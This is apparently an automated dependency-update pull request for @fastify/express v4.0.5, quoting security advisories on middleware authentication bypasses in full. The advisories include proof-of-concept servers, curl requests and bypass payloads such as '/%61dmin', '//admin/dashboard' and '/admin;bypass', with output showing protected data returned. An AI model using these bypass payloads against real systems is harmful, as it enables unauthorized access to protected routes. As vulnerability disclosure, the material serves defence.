fix(deps): update dependency @fastify/express to v4.0.5 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@fastify/express	4.0.2 → 4.0.5

---

@​fastify/express vulnerable to Improper Handling of URL Encoding (Hex Encoding)

CVE-2026-22037 / GHSA-g6q3-96cp-5r5m

More information

Details

Summary

A security vulnerability exists in @fastify/express where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.

Details

The vulnerability is caused by how @fastify/express matches requests against registered middleware paths.

PoC

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register fastify-express for Express-style middleware support
  await fastify.register(require('@​fastify/express'));

  // Middleware to block /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });

  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });

  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });

  fastify.get('/admin/dashboard', async (request, reply) => {
    return { message: 'Admin dashboard' };
  });

  // Start server
  try {
    await fastify.listen({ port: 3000 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}

start();

Step 2: Execute the attack.

➜  ~ curl http://206.189.140.29:3000/%61dmin
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /%61dmin</pre>
</body>
</html>

(fastify express)

➜  ~ curl http://206.189.140.29:3000/%61dmin
{"message":"Admin panel"}

It differs from CVE-2026-22031 because this is a different npm module with its own code.

Severity

• CVSS Score: 8.4 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-g6q3-96cp-5r5m
• https://nvd.nist.gov/vuln/detail/CVE-2026-22037
• https://github.com/fastify/fastify-express/commit/dc02a3fe1387f945143f22597baa42557d549a40
• https://github.com/fastify/fastify-express/releases/tag/v4.0.3
• https://github.com/advisories/GHSA-g6q3-96cp-5r5m

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

@​fastify/express's middleware path doubling causes authentication bypass in child plugin scopes

CVE-2026-33807 / GHSA-hrwm-hgmj-7p9c

More information

Details

Summary

@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration.

Details

The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.

The call flow demonstrates the problem:

1. Parent scope registers middleware: app.use('/admin', authFn) — use() calculates path as '' + '/admin' = '/admin' — stores ['/admin', authFn] in kMiddlewares
2. Child plugin registers with { prefix: '/admin' } — triggers onRegister(instance)
3. onRegister copies parent middleware and calls instance.use('/admin', authFn) on child
4. Child's use() function calculates path as '/admin' + '/admin' = '/admin/admin' — registers middleware with doubled path
5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path /admin/admin
6. Requests to /admin/secret don't match /admin/admin — middleware is silently skipped

The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.

PoC

const fastify = require('fastify');
const http = require('http');

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => resolve({ status: res.statusCode, body: data }));
    }).on('error', reject);
  });
}

async function test() {
  const app = fastify({ logger: false });
  await app.register(require('@​fastify/express'));
  
  // Middleware enforcing auth on /admin routes
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403;
      res.setHeader('content-type', 'application/json');
      res.end(JSON.stringify({ error: 'Forbidden' }));
      return;
    }
    next();
  });
  
  // Root scope route — middleware works correctly
  app.get('/admin/root-data', async () => ({ data: 'root-secret' }));
  
  // Child scope route — middleware BYPASSED
  await app.register(async function(child) {
    child.get('/secret', async () => ({ data: 'child-secret' }));
  }, { prefix: '/admin' });
  
  await app.listen({ port: 19876, host: '0.0.0.0' });
  
  // Root scope: correctly blocked
  let r = await get(19876, '/admin/root-data');
  console.log('/admin/root-data (no auth):', r.status, r.body);
  // Output: 403 {"error":"Forbidden"}
  
  // Child scope: BYPASSED — secret data returned without auth
  r = await get(19876, '/admin/secret');
  console.log('/admin/secret (no auth):', r.status, r.body);
  // Output: 200 {"data":"child-secret"}
  
  await app.close();
}
test();

Actual output:

/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}

Impact

Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.

• No special request crafting is required — normal requests bypass the middleware
• It affects the idiomatic Fastify plugin pattern commonly used in production
• The bypass is silent with no errors or warnings
• Developers' basic testing of root-scoped routes will pass, masking the vulnerability
• Any child plugin scope that shares a prefix with middleware is affected

Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.

Affected Versions

• @fastify/express v4.0.4 (latest at time of discovery)
• Fastify 5.x in default configuration
• No special router options required (ignoreDuplicateSlashes not needed)
• Affects any child plugin registration where the prefix overlaps with middleware path scoping
• Does NOT affect middleware registered without path scoping (global middleware)
• Does NOT affect middleware registered on root path (/) due to special case handling

Variant Testing

Scenario	Middleware Path	Child Prefix	Result
Root route /admin/root-data	/admin	N/A	Middleware runs (403)
Child route /admin/secret	/admin	/admin	BYPASS (200)
Child route /api/data	/api	/api	BYPASS (200)
Nested child /admin/sub/data	/admin	/admin/sub	BYPASS — path becomes /admin/sub/admin
Middleware on / with any child	/	/api	No bypass — path === '/' && prefix.length > 0 special case

Suggested Fix

The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include:

1. Store the original path and function separately in kMiddlewares before prefixing
2. Strip the parent prefix before re-registering in child scopes
3. Store already-constructed Express middleware objects rather than re-processing paths

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-hrwm-hgmj-7p9c
• https://nvd.nist.gov/vuln/detail/CVE-2026-33807
• https://cna.openjsf.org/security-advisories.html
• https://github.com/advisories/GHSA-hrwm-hgmj-7p9c

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

@​fastify/express vulnerable to Improper Handling of URL Encoding (Hex Encoding)

CVE-2026-22037 / GHSA-g6q3-96cp-5r5m

More information

Details

Summary

A security vulnerability exists in @fastify/express where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.

Details

The vulnerability is caused by how @fastify/express matches requests against registered middleware paths.

PoC

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register fastify-express for Express-style middleware support
  await fastify.register(require('@​fastify/express'));

  // Middleware to block /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });

  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });

  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });

  fastify.get('/admin/dashboard', async (request, reply) => {
    return { message: 'Admin dashboard' };
  });

  // Start server
  try {
    await fastify.listen({ port: 3000 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}

start();

Step 2: Execute the attack.

➜  ~ curl http://206.189.140.29:3000/%61dmin
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /%61dmin</pre>
</body>
</html>

(fastify express)

➜  ~ curl http://206.189.140.29:3000/%61dmin
{"message":"Admin panel"}

It differs from CVE-2026-22031 because this is a different npm module with its own code.

Severity

• CVSS Score: 8.4 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-g6q3-96cp-5r5m
• https://nvd.nist.gov/vuln/detail/CVE-2026-22037
• https://github.com/fastify/fastify-express/commit/dc02a3fe1387f945143f22597baa42557d549a40
• https://github.com/fastify/fastify-express
• https://github.com/fastify/fastify-express/releases/tag/v4.0.3

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

@​fastify/express has a middleware authentication bypass via URL normalization gaps (duplicate slashes and semicolons)

CVE-2026-33808 / GHSA-6hw5-45gm-fj88

More information

Details

Summary

@fastify/express v4.0.4 fails to normalize URLs before passing them to Express middleware when Fastify router normalization options are enabled. This allows complete bypass of path-scoped authentication middleware via two vectors:

1. Duplicate slashes (//admin/dashboard) when ignoreDuplicateSlashes: true is configured
2. Semicolon delimiters (/admin;bypass) when useSemicolonDelimiter: true is configured

In both cases, Fastify's router normalizes the URL and matches the route, but @fastify/express passes the original un-normalized URL to Express middleware, which fails to match and is skipped.

Note: This is distinct from GHSA-g6q3-96cp-5r5m (CVE-2026-22037), which addressed URL percent-encoding bypass and was patched in v4.0.3. These normalization gaps remain in v4.0.4. A similar class of normalization issue was addressed in @fastify/middie via GHSA-8p85-9qpw-fwgw (CVE-2026-2880), but @fastify/express does not include the equivalent fixes.

Details

The vulnerability exists in @fastify/express's enhanceRequest function (index.js lines 43-46):

const decodedUrl = decodeURI(url)
req.raw.url = decodedUrl

The decodeURI() function only handles percent-encoding — it does not normalize duplicate slashes or strip semicolon-delimited parameters. When Fastify's router options are enabled, find-my-way applies these normalizations during route matching, but @fastify/express passes the original URL to Express middleware.

Vector 1: Duplicate Slashes

When ignoreDuplicateSlashes: true is set, Fastify's find-my-way router normalizes //admin/dashboard to /admin/dashboard for route matching. However, Express middleware receives //admin/dashboard. Express's app.use('/admin', authMiddleware) expects paths to start with /admin/, but //admin does not match the /admin prefix pattern.

The attack sequence:

1. Client sends GET //admin/dashboard
2. Fastify's router normalizes this to /admin/dashboard and finds a matching route
3. enhanceRequest sets req.raw.url = "//admin/dashboard" (preserves double slash)
4. Express middleware app.use('/admin', authMiddleware) does not match //admin prefix
5. Authentication is bypassed, and the Fastify route handler executes

Vector 2: Semicolon Delimiters

When useSemicolonDelimiter: true is configured, the router uses find-my-way's safeDecodeURI() which treats semicolons as query string delimiters, splitting /admin;bypass into path /admin and querystring bypass for route matching. However, @fastify/express passes the full URL /admin;bypass to Express middleware.

Express uses path-to-regexp v0.1.12 internally, which compiles middleware paths like /admin to the regex /^\/admin\/?(?=\/|$)/i. A semicolon character does not satisfy the lookahead condition, causing the middleware match to fail.

The attack flow:

1. Request GET /admin;bypass arrives
2. Fastify router: splits at ; — matches route GET /admin
3. Express middleware: regex /^\/admin\/?(?=\/|$)/i fails against /admin;bypass — middleware skipped
4. Route handler executes without authentication checks

PoC

Duplicate Slash Bypass

Save as server.js and run with node server.js:

const fastify = require('fastify')

async function start() {
  const app = fastify({
    logger: false,
    ignoreDuplicateSlashes: true,  // documented Fastify option
  })

  await app.register(require('@​fastify/express'))

  // Standard Express middleware auth pattern
  app.use('/admin', function expressAuthGate(req, res, next) {
    const auth = req.headers.authorization
    if (!auth || auth !== 'Bearer admin-secret-token') {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden by Express middleware' }))
      return
    }
    next()
  })

  // Protected route
  app.get('/admin/dashboard', async (request) => {
    return { message: 'Admin dashboard', secret: 'sensitive-admin-data' }
  })

  await app.listen({ port: 3000 })
  console.log('Listening on http://localhost:3000')
}
start()

##### Normal access — blocked by Express middleware
$ curl -s http://localhost:3000/admin/dashboard
{"error":"Forbidden by Express middleware"}

##### Double-slash bypass — Express middleware skipped, handler runs
$ curl -s http://localhost:3000//admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

##### Triple-slash also works
$ curl -s http://localhost:3000///admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

Multiple variants work: ///admin, /.//admin, //admin//dashboard, etc.

Semicolon Bypass

const fastify = require('fastify')
const http = require('http')

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = ''
      res.on('data', (chunk) => data += chunk)
      res.on('end', () => resolve({ status: res.statusCode, body: data }))
    }).on('error', reject)
  })
}

async function test() {
  const app = fastify({ 
    logger: false, 
    routerOptions: { useSemicolonDelimiter: true }
  })
  await app.register(require('@​fastify/express'))
  
  // Auth middleware blocking unauthenticated access
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden' }))
      return
    }
    next()
  })
  
  app.get('/admin', async () => ({ secret: 'classified-info' }))
  
  await app.listen({ port: 19900, host: '0.0.0.0' })
  
  // Blocked:
  let r = await get(19900, '/admin')
  console.log('/admin:', r.status, r.body)
  // Output: /admin: 403 {"error":"Forbidden"}
  
  // BYPASS:
  r = await get(19900, '/admin;bypass')
  console.log('/admin;bypass:', r.status, r.body)
  // Output: /admin;bypass: 200 {"secret":"classified-info"}
  
  r = await get(19900, '/admin;')
  console.log('/admin;:', r.status, r.body)
  // Output: /admin;: 200 {"secret":"classified-info"}
  
  await app.close()
}
test()

Actual output:

/admin: 403 {"error":"Forbidden"}
/admin;bypass: 200 {"secret":"classified-info"}
/admin;: 200 {"secret":"classified-info"}

The semicolon bypass works with any text after it: /admin;, /admin;x, /admin;jsessionid=123.

Impact

Complete authentication bypass for applications using Express middleware for path-based access control. An unauthenticated attacker can access protected routes (admin panels, APIs, user data) by manipulating the URL path.

Duplicate slash vector affects applications that:

1. Use @fastify/express with ignoreDuplicateSlashes: true
2. Rely on Express middleware for authentication/authorization
3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

Semicolon vector affects applications that:

1. Use @fastify/express with useSemicolonDelimiter: true (commonly enabled for Java application server compatibility, e.g., handling ;jsessionid= parameters)
2. Rely on Express middleware for authentication/authorization
3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

The bypass works against all Express middleware that uses prefix path matching, including popular packages like express-basic-auth, custom authentication middleware, and rate limiting middleware.

The ignoreDuplicateSlashes and useSemicolonDelimiter options are documented as convenience features, not marked as security-sensitive, so developers would not expect them to impact middleware security.

Affected Versions

• @fastify/express v4.0.4 (latest) with Fastify 5.x
• Requires ignoreDuplicateSlashes: true or useSemicolonDelimiter: true in Fastify configuration (via top-level option or routerOptions)

Variant Testing

Duplicate slashes:

Request	Express Middleware	Handler Runs	Result
GET /admin/dashboard	Invoked (blocks)	No	403 Forbidden
GET //admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET ///admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET /.//admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET //admin//dashboard	Skipped	Yes	200 OK — BYPASS
GET /admin//dashboard	Invoked (blocks)	No	403 Forbidden

Semicolons:

URL	Express MW Fires	Route Matches	Result
/admin	Yes	Yes (200/403)	Normal
/admin;	No	Yes (200)	BYPASS
/admin;bypass	No	Yes (200)	BYPASS
/admin;x=1	No	Yes (200)	BYPASS
/admin;/dashboard	No	Yes (200, routes to /admin)	BYPASS
/admin/dashboard;x	Yes	Yes (routes to /admin/dashboard)	Normal (prefix /admin/ still matches)

The semicolon bypass is effective when the semicolon appears immediately after the middleware prefix boundary. For sub-paths where the prefix is already matched (e.g., /admin/dashboard;x), Express's prefix regex succeeds because the /admin/ part matches before the semicolon appears.

Suggested Fix

@fastify/express should normalize URLs before passing them to Express middleware, respecting the router normalization options that are enabled. Specifically:

• When ignoreDuplicateSlashes is enabled, apply FindMyWay.removeDuplicateSlashes() to req.raw.url before middleware execution
• When useSemicolonDelimiter is enabled, strip semicolon-delimited parameters from the URL before passing to Express

This would match the normalization behavior that @fastify/middie already implements via sanitizeUrlPath() and normalizePathForMatching().

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-6hw5-45gm-fj88
• https://nvd.nist.gov/vuln/detail/CVE-2026-33808
• https://cna.openjsf.org/security-advisories.html
• https://github.com/fastify/fastify-express

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

@​fastify/express's middleware path doubling causes authentication bypass in child plugin scopes

CVE-2026-33807 / GHSA-hrwm-hgmj-7p9c

More information

Details

Summary

@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration.

Details

The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.

The call flow demonstrates the problem:

1. Parent scope registers middleware: app.use('/admin', authFn) — use() calculates path as '' + '/admin' = '/admin' — stores ['/admin', authFn] in kMiddlewares
2. Child plugin registers with { prefix: '/admin' } — triggers onRegister(instance)
3. onRegister copies parent middleware and calls instance.use('/admin', authFn) on child
4. Child's use() function calculates path as '/admin' + '/admin' = '/admin/admin' — registers middleware with doubled path
5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path /admin/admin
6. Requests to /admin/secret don't match /admin/admin — middleware is silently skipped

The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.

PoC

const fastify = require('fastify');
const http = require('http');

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => resolve({ status: res.statusCode, body: data }));
    }).on('error', reject);
  });
}

async function test() {
  const app = fastify({ logger: false });
  await app.register(require('@​fastify/express'));
  
  // Middleware enforcing auth on /admin routes
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403;
      res.setHeader('content-type', 'application/json');
      res.end(JSON.stringify({ error: 'Forbidden' }));
      return;
    }
    next();
  });
  
  // Root scope route — middleware works correctly
  app.get('/admin/root-data', async () => ({ data: 'root-secret' }));
  
  // Child scope route — middleware BYPASSED
  await app.register(async function(child) {
    child.get('/secret', async () => ({ data: 'child-secret' }));
  }, { prefix: '/admin' });
  
  await app.listen({ port: 19876, host: '0.0.0.0' });
  
  // Root scope: correctly blocked
  let r = await get(19876, '/admin/root-data');
  console.log('/admin/root-data (no auth):', r.status, r.body);
  // Output: 403 {"error":"Forbidden"}
  
  // Child scope: BYPASSED — secret data returned without auth
  r = await get(19876, '/admin/secret');
  console.log('/admin/secret (no auth):', r.status, r.body);
  // Output: 200 {"data":"child-secret"}
  
  await app.close();
}
test();

Actual output:

/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}

Impact

Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.

• No special request crafting is required — normal requests bypass the middleware
• It affects the idiomatic Fastify plugin pattern commonly used in production
• The bypass is silent with no errors or warnings
• Developers' basic testing of root-scoped routes will pass, masking the vulnerability
• Any child plugin scope that shares a prefix with middleware is affected

Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.

Affected Versions

• @fastify/express v4.0.4 (latest at time of discovery)
• Fastify 5.x in default configuration
• No special router options required (ignoreDuplicateSlashes not needed)
• Affects any child plugin registration where the prefix overlaps with middleware path scoping
• Does NOT affect middleware registered without path scoping (global middleware)
• Does NOT affect middleware registered on root path (/) due to special case handling

Variant Testing

Scenario	Middleware Path	Child Prefix	Result
Root route /admin/root-data	/admin	N/A	Middleware runs (403)
Child route /admin/secret	/admin	/admin	BYPASS (200)
Child route /api/data	/api	/api	BYPASS (200)
Nested child /admin/sub/data	/admin	/admin/sub	BYPASS — path becomes /admin/sub/admin
Middleware on / with any child	/	/api	No bypass — path === '/' && prefix.length > 0 special case

Suggested Fix

The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include:

1. Store the original path and function separately in kMiddlewares before prefixing
2. Strip the parent prefix before re-registering in child scopes
3. Store already-constructed Express middleware objects rather than re-processing paths

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-hrwm-hgmj-7p9c
• https://nvd.nist.gov/vuln/detail/CVE-2026-33807
• https://cna.openjsf.org/security-advisories.html
• https://github.com/fastify/fastify-express

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

fastify/fastify-express (@​fastify/express)

v4.0.5

Compare Source

⚠️ Security Release

This fixes CVE CVE-2026-33807 GHSA-hrwm-hgmj-7p9c.
This fixes CVE CVE-2026-33808 GHSA-6hw5-45gm-fj88.

What's Changed

• build(deps): bump express from 4.22.1 to 5.2.1 by @​dependabot[bot] in #​179
• ci: remove stale.yml by @​Tony133 in #​181
• build(deps-dev): bump c8 from 10.1.3 to 11.0.0 by @​dependabot[bot] in #​183
• chore(license): standardise license notice by @​Fdawgs in #​182
• build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by @​dependabot[bot] in #​185
• build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by @​dependabot[bot] in #​187
• ci: add lock-threads workflow by @​Fdawgs in #​188

New Contributors

• @​Tony133 made their first contribution in #​181

Full Changelog: fastify/fastify-express@v4.0.4...v4.0.5

v4.0.4

Compare Source

What's Changed

• fix: decode url with query params by @​nolway in #​178

New Contributors

• @​nolway made their first contribution in #​178

Full Changelog: fastify/fastify-express@v4.0.3...v4.0.4

v4.0.3

Compare Source

What's Changed

• build(dependabot): reduce npm updates to monthly by @​Fdawgs in #​157
• chore: rename master to main by @​Fdawgs in #​158
• test: migrate to node test runner by @​ilteoood in #​159
• ci(ci): set job permissions by @​Fdawgs in #​161
• docs(readme): update plugin version syntax by @​Fdawgs in #​162
• ci: set permissions at workflow level by @​Fdawgs in #​163
• ci: restore job level permissions by @​Fdawgs in #​164
• build(deps): bump express from 4.21.2 to 5.1.0 by @​dependabot[bot] in #​166
• build(deps-dev): bump serve-static from 1.16.2 to 2.2.0 by @​dependabot[bot] in #​165
• build(deps-dev): bump tsd from 0.31.2 to 0.32.0 by @​dependabot[bot] in #​168
• chore(license): update date ranges; standardise style by @​Fdawgs in #​169
• chore(.npmrc): ignore scripts by @​Fdawgs in #​171
• ci(ci): add concurrency config by @​Fdawgs in #​172
• build(deps-dev): bump tsd from 0.32.0 to 0.33.0 by @​dependabot[bot] in #​170
• fix: decode paths before matching by @​mcollina in #​174
• fix: restore express4 by @​Eomm in #​176

New Contributors

• @​ilteoood made their first contribution in #​159

Full Changelog: fastify/fastify-express@v4.0.2...v4.0.3

---

Configuration

📅 Schedule: (in timezone Asia/Tokyo)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 44.67%. Comparing base (8d07eb8) to head (364ef67).

Additional details and impacted files

@@             Coverage Diff              @@
##           develop     #872       +/-   ##
============================================
+ Coverage    19.22%   44.67%   +25.45%     
============================================
  Files          954     1923      +969     
  Lines        97042   215448   +118406     
  Branches      1428     5846     +4418     
============================================
+ Hits         18654    96252    +77598     
- Misses       78381   119164    +40783     
- Partials         7       32       +25     

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[github-actions]

이 PR에 의한 api.json 차이
차이점이 없습니다.
Get diff files from Workflow Page